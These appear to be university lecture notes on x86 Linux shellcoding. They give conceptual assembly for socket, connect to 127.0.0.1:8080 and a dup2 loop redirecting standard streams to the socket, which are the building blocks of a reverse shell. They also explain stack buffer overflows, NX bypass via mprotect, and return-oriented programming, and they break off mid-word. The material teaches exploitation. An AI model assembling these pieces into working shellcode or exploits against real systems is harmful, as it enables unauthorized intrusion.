cs1650 - Lecture10 - Detailed Study Notes on Shell Coding, System Calls, and Code Reuse Techniques
Overview of Shell Coding and System Calls
Understanding the principles of shell coding, particularly in relation to system calls like socket, connect, and dup2.
Emphasis on minimizing code size, crucial for fitting shellcode into small buffer overflows, and using various clever tricks to manage the execution flow and make the shellcode position-independent.
Introduction to Socket System Call
System call for creating a socket: socket.
Arguments to socket:
  Domain: AF_INET (value 2), for IPv4 internet protocols.
  Type: SOCK_STREAM (value 1), for connection-oriented TCP sockets.
  Protocol: 0 (default protocol, usually TCP for SOCK_STREAM).
How to determine constants: consult header files (e.g., <sys/socket.h>), read man pages (e.g., man 2 socket), or write small C programs to print their values.
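As a quick check of the constants above, a short script can print them. This sketch uses Python's standard socket module instead of a C program; it assumes a typical Linux host, where the module's values mirror those in <sys/socket.h>.

```python
import socket

# The standard library exposes the platform's header values as integers.
constants = {
    "AF_INET": int(socket.AF_INET),
    "SOCK_STREAM": int(socket.SOCK_STREAM),
}

for name, value in constants.items():
    print(f"{name} = {value} (0x{value:x})")
```

The same approach works for any other constant the socket module exposes, which is handy when a header is hard to read because of nested includes.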
Implementation Steps for Socket Creation
Store the socket system call number (359, i.e. 0x167, on 32-bit Linux x86) in the EAX register.
Set arguments in the EBX, ECX, and EDX registers:
  2 (for AF_INET) into EBX.
  1 (for SOCK_STREAM) into ECX.
  0 (for default protocol) into EDX.
Invoke the int 0x80 instruction to execute the system call. The new socket's file descriptor is returned in EAX.
  ; conceptual assembly for socket(AF_INET, SOCK_STREAM, 0)
  ; assumes a kernel that exposes socket as a direct syscall (Linux 4.3+ on x86);
  ; older kernels multiplex it through socketcall (number 102, sub-call SYS_SOCKET = 1)
  mov eax, 0x167   ; syscall number 359 (0x167) for socket
  mov ebx, 0x2     ; AF_INET
  mov ecx, 0x1     ; SOCK_STREAM
  mov edx, 0x0     ; protocol 0
  int 0x80         ; EAX now holds the socket file descriptor
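For comparison, the same call can be made from a high-level language. This is only an illustrative sketch using Python's standard socket module: the three constructor arguments correspond to the values the shellcode loads into EBX, ECX, and EDX, and fileno() plays the role of the descriptor returned in EAX.

```python
import socket

# socket(AF_INET, SOCK_STREAM, 0): the same three arguments the assembly
# version places in EBX, ECX, and EDX.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

# The descriptor is a small non-negative integer, the counterpart of the
# value the raw system call leaves in EAX.
sockfd = sock.fileno()
print("socket file descriptor:", sockfd)

sock.close()
```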
Efficiency in Shell Code
Different encoding techniques can minimize byte size for instructions, which is critical for shellcode.
Using push and pop instructions effectively to transfer values to registers, often saving bytes compared to mov instructions.
Example of encoding efficiency:
  To place the value 0x43 into EAX using MOV, it would be mov eax, 0x43 (5 bytes: B8 43 00 00 00).
  Using push with an 8-bit immediate: push 0x43 encodes as 6A 43 (2 bytes), followed by pop eax (1 byte: 58), totaling 3 bytes. This is more efficient for small immediate values.
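The byte counts above can be reproduced with a small encoder. This is a minimal sketch covering only these two instruction forms (the function names are made up for illustration); it also shows that the mov form embeds zero bytes, which is often a problem when the overflow goes through a string copy.

```python
import struct

def encode_mov_eax(imm):
    """mov eax, imm32: opcode B8 followed by a 4-byte little-endian immediate."""
    return b"\xb8" + struct.pack("<I", imm & 0xFFFFFFFF)

def encode_push_pop_eax(imm):
    """push imm8 ; pop eax: 6A ib, then 58. Valid only for -128..127."""
    if not -128 <= imm <= 127:
        raise ValueError("push imm8 needs a signed 8-bit immediate")
    return b"\x6a" + struct.pack("<b", imm) + b"\x58"

mov_bytes = encode_mov_eax(0x43)
push_pop_bytes = encode_push_pop_eax(0x43)

print("mov eax, 0x43       :", mov_bytes.hex(" "), f"({len(mov_bytes)} bytes)")
print("push 0x43 ; pop eax :", push_pop_bytes.hex(" "), f"({len(push_pop_bytes)} bytes)")
```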
Sequence of Instructions
Using various instructions to manipulate register values and the stack:
  MOV to place immediate values or register contents into other registers or memory.
  POP to retrieve values from the top of the stack into registers.
  INC (increment) and DEC (decrement) to adjust register values with single-byte instructions, often used for small constants or small offsets.
Data Structure for Connection via connect
Details on the sockaddr_in data structure passed to the connect call, which defines the target address:
  sin_family: Field for address family (2 bytes, AF_INET, value 2). This field is in host byte order.
  sin_port: Field for port (2 bytes, e.g., 8080). This must be in network byte order.
  sin_addr: Field for IP address (4 bytes, e.g., 127.0.0.1). This also must be in network byte order.
Layout of the sockaddr_in structure in memory (conceptual):
  +-----------------------+ <-- Address of structure (e.g., ESP)
  | sin_family: AF_INET   |  2 bytes, host byte order (bytes 02 00 on x86)
  +-----------------------+
  | sin_port: 8080        |  2 bytes, network byte order (8080 = 0x1F90, bytes 1F 90)
  +-----------------------+
  | sin_addr: 127.0.0.1   |  4 bytes, network byte order (bytes 7F 00 00 01; 0x0100007F when read as a little-endian dword)
  +-----------------------+
  | Padding               |  8 bytes of 0x00
  +-----------------------+ <-- Size is typically 16 bytes for sockaddr_in
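The layout above can be reproduced byte for byte with Python's struct module. This is a sketch under the assumption of a Linux-style sockaddr_in; the helper name pack_sockaddr_in is made up for illustration. Note that sin_family is stored in host byte order, while the port and address are big-endian.

```python
import socket
import struct

def pack_sockaddr_in(ip, port):
    """Build the 16-byte sockaddr_in image for an IPv4 address and port."""
    family = struct.pack("=H", socket.AF_INET)  # 2 bytes, host byte order
    port_be = struct.pack("!H", port)           # 2 bytes, network byte order
    addr_be = socket.inet_aton(ip)              # 4 bytes, network byte order
    padding = b"\x00" * 8                       # zero padding up to 16 bytes
    return family + port_be + addr_be + padding

raw = pack_sockaddr_in("127.0.0.1", 8080)
print(raw.hex(" "), f"({len(raw)} bytes)")
```

Reading the port bytes 1F 90 as a little-endian word gives 0x901F, which is why the assembly version pushes that value.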
Connection Sequence
Execute the connect system call after the socket creation, which yields a file descriptor.
Use the socket file descriptor (returned by socket) as the first argument for connect (in EBX).
Prepare the sockaddr_in structure on the stack with the target IP and port.
The second argument (in ECX) will be a pointer to this sockaddr_in structure (e.g., ESP).
The third argument (in EDX) will be the size of the structure (16 bytes for sockaddr_in).
Use int 0x80 to make the connect call and check for errors or success based on the EAX return value (0 for success, a negative error code on failure).
  ; conceptual assembly for connect(sockfd, &sockaddr_in, sizeof(sockaddr_in))
  ; assumes EAX still holds sockfd from the previous socket call
  mov ebx, eax        ; first argument: socket file descriptor
  push 0x0            ; padding, upper 4 bytes
  push 0x0            ; padding, lower 4 bytes
  push 0x0100007f     ; IP 127.0.0.1 (bytes 7F 00 00 01 in memory)
  push word 0x901f    ; port 8080 (bytes 1F 90 in memory, i.e. 0x1F90 in network byte order)
  push word 0x2       ; AF_INET (0x0002)
  mov ecx, esp        ; second argument: pointer to sockaddr_in on the stack
  mov edx, 0x10       ; third argument: size of sockaddr_in (16 bytes)
  mov eax, 0x16a      ; syscall number 362 (0x16a) for connect as a direct syscall (Linux 4.3+ on x86)
  int 0x80            ; EAX now holds the return value (0 for success)
  ; On kernels that only offer the socketcall wrapper: EAX = 102 (0x66), EBX = 3 (SYS_CONNECT),
  ; ECX = pointer to the argument array {sockfd, pointer to sockaddr_in, 16}
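The connect sequence can be exercised safely against a listener on the local machine. This is an illustrative sketch, assuming loopback networking is available; the function name connect_demo is made up, and connect_ex is used because it returns an error code instead of raising, much like inspecting EAX after the raw call.

```python
import socket

def connect_demo():
    """Connect to a throwaway local listener and return connect's result code."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    listener.bind(("127.0.0.1", 0))      # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    # connect(sockfd, &sockaddr_in, 16); returns 0 on success, errno otherwise
    rc = client.connect_ex(("127.0.0.1", port))

    client.close()
    listener.close()
    return rc

rc = connect_demo()
print("connect returned", rc)
```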
Duplication of File Descriptors
Use the dup2 system call to duplicate file descriptors for standard input (0), standard output (1), and standard error (2), redirecting them to the established socket.
The dup2 syscall number on Linux x86 is 63 (or 0x3F).
Sequence of operations for duplicating the socket file descriptor (oldfd) to stdin, stdout, stderr (newfd):
The dup2 syscall requires:
  EAX must hold 0x3F (decimal 63).
  EBX must hold the oldfd (the socket file descriptor).
  ECX must hold the newfd (which will be 2, then 1, then 0).
  ; conceptual assembly for dup2(sockfd, 2), dup2(sockfd, 1), dup2(sockfd, 0)
  ; sock_fd_value is a placeholder for the descriptor returned by socket
  mov ebx, sock_fd_value   ; load socket fd into EBX (oldfd)
  mov ecx, 0x2             ; start with newfd = 2 (stderr)
  loop_dup:
  mov eax, 0x3f            ; syscall number 63 (0x3F) for dup2; reloaded because EAX holds the previous return value
  int 0x80
  dec ecx                  ; decrement newfd (2 -> 1 -> 0)
  jns loop_dup             ; loop while ECX is not negative (i.e., for 2, 1, 0)
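The effect of the dup2 loop can be observed without touching the current process's own standard streams. This is a minimal sketch, assuming a Unix-like system with fork: a child process redirects descriptors 2, 1, and 0 to one end of a socket pair, and the parent reads what the child writes to descriptor 1. The function name and message are made up for illustration.

```python
import os
import socket

def redirect_stdio_demo():
    """Fork a child that points fds 2, 1, 0 at a socket, then writes to fd 1."""
    parent_end, child_end = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        # Child: same countdown as the assembly loop (2 -> 1 -> 0).
        try:
            parent_end.close()
            oldfd = child_end.fileno()
            for newfd in (2, 1, 0):
                os.dup2(oldfd, newfd)
            os.write(1, b"hello from fd 1")   # now goes to the socket
        finally:
            os._exit(0)                       # never return into the parent's code
    # Parent: whatever the child wrote to "stdout" arrives on the socket.
    child_end.close()
    data = parent_end.recv(64)
    os.waitpid(pid, 0)
    parent_end.close()
    return data

received = redirect_stdio_demo()
print(received)
```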
Handling Control Flow Hijacking
The process of hijacking the control flow, typically via overwriting return addresses on the stack during a buffer overflow.
This allows an attacker to steer program execution from its legitimate path to arbitrary shellcode injected into memory.
When a function returns, the EIP (instruction pointer) is loaded with the address stored at the top of the stack. By overwriting this address with the entry point of injected shellcode, control is transferred.
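The overwrite can be modeled with a byte array standing in for a stack frame. This is a toy simulation, not real process memory: the frame layout (16-byte buffer, saved EBP, return address) and all addresses are hypothetical values chosen for illustration.

```python
import struct

BUF_SIZE = 16                      # hypothetical size of the local buffer
RET_OFFSET = BUF_SIZE + 4          # buffer, then 4-byte saved EBP, then return address

def make_frame(return_address):
    """Model a frame as [ buffer | saved EBP | return address ]."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<II", 0xBFFFF000, return_address))

def unchecked_copy(frame, data):
    """Copy like strcpy would: no check against BUF_SIZE."""
    frame[:len(data)] = data

def saved_return(frame):
    """Read the return address that a ret would load into EIP."""
    return struct.unpack_from("<I", frame, RET_OFFSET)[0]

frame = make_frame(0x08048400)
before = saved_return(frame)

# 16 bytes fill the buffer, 4 cover saved EBP, the last 4 replace the return address.
unchecked_copy(frame, b"A" * 20 + struct.pack("<I", 0xDEADBEEF))
after = saved_return(frame)

print(hex(before), "->", hex(after))
```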
Non-Executable Memory and Code Reuse
Introduction of non-executable pages (e.g., Data Execution Prevention, NX bit) as a defense mechanism to prevent execution of code from data segments (like the stack or heap).
Explanation of the mprotect system call for altering memory permissions (e.g., PROT_EXEC to make a page executable).
mprotect arguments include: addr (start address, which must be page-aligned), len (length of region), and prot (protection flags like PROT_READ | PROT_WRITE | PROT_EXEC).
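Two details of the mprotect arguments are easy to get wrong: the start address has to be rounded down to a page boundary, and the flags are combined with bitwise OR. The sketch below only computes those values and does not call mprotect; it assumes a Unix-like system where Python's mmap module exposes the PROT_* constants, and the sample address is hypothetical.

```python
import mmap

def page_align(addr, page_size=mmap.PAGESIZE):
    """Round an address down to the start of its page (page_size is a power of two)."""
    return addr & ~(page_size - 1)

# Combined protection flags, as passed in the third argument.
prot = mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC

sample_addr = 0x0804A123           # hypothetical address inside a data page
aligned = page_align(sample_addr, 0x1000)

print(f"aligned start: {aligned:#010x}, prot flags: {prot}")
```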
Code Injection Techniques
Discussion on bypassing non-execution protections without directly injecting new executable assembly code.
How to leverage existing code already present in memory (e.g., within shared libraries like libc) rather than injecting new assembly code directly.
This method, known as Return-Oriented Programming (ROP), involves chaining small sequences of existing instructions (called "gadgets") that end in a ret instruction. By carefully controlling the stack, these gadgets can be executed in sequence to perform arbitrary operations, effectively creating new logic from existing code.
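The chaining idea can be illustrated with a toy interpreter in which the stack is a list and each gadget is a small function. This is a simulation only: the gadget addresses and the three gadgets are hypothetical, and real chains are built from addresses found in an actual binary.

```python
# Hypothetical gadget addresses, standing in for code found in a library.
POP_EAX = 0x1000       # pop eax ; ret
POP_EBX = 0x2000       # pop ebx ; ret
ADD_EAX_EBX = 0x3000   # add eax, ebx ; ret

def pop_eax(regs, stack, sp):
    regs["eax"] = stack[sp]        # pop consumes one stack slot
    return sp + 1

def pop_ebx(regs, stack, sp):
    regs["ebx"] = stack[sp]
    return sp + 1

def add_eax_ebx(regs, stack, sp):
    regs["eax"] = (regs["eax"] + regs["ebx"]) & 0xFFFFFFFF
    return sp                      # no stack slot consumed

GADGETS = {POP_EAX: pop_eax, POP_EBX: pop_ebx, ADD_EAX_EBX: add_eax_ebx}

def run_chain(stack):
    """Execute a chain: each ret pops the next gadget address off the stack."""
    regs = {"eax": 0, "ebx": 0}
    sp = 0
    while sp < len(stack):
        target = stack[sp]         # ret loads the next address into EIP
        sp += 1
        gadget = GADGETS.get(target)
        if gadget is None:         # unknown address: stop the simulation
            break
        sp = gadget(regs, stack, sp)
    return regs

# Stack contents as the attacker would lay them out: addresses and data interleaved.
chain = [POP_EAX, 5, POP_EBX, 7, ADD_EAX_EBX]
result = run_chain(chain)
print(result)
```

No new instructions are introduced here; the "program" is entirely the sequence of addresses and values on the stack.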
Structuring Shell Code for Execution
Crafting shell code (or ROP chains) in such a way that it can resume control to already present functions after executing its payload or perform complex operations using chained gadgets.
Building diagrammatic representations of where stack pointers (ESP) point during controlled execution, showing how return addresses are manipulated to call gadgets and manage function arguments on the stack.
Conclusion and Future Directions
Continued exploration of the nuances in bypassing memory protections through direct control of memory and exploitation techniques.
High-